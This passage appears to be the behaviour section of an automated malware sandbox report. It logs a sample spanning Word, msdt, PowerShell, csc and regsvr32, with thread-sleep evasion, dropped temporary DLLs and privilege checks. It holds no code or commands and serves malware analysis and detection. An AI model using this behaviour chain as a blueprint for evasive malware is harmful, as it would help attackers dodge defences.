                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep count: 6508 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep time: -9223372036854770s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep count: 1582 > 30
                          Source: C:\Windows\SysWOW64\explorer.exe TID: 6660Thread sleep count: 9997 > 30
                          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3372Thread sleep count: 114 > 30
                          Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6508
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582
                          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 2450
                          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1542
                          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 9997
                          Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BDD62 GetSystemInfo,
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AABCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0481BCFC FindFirstFileW,FindNextFileW,
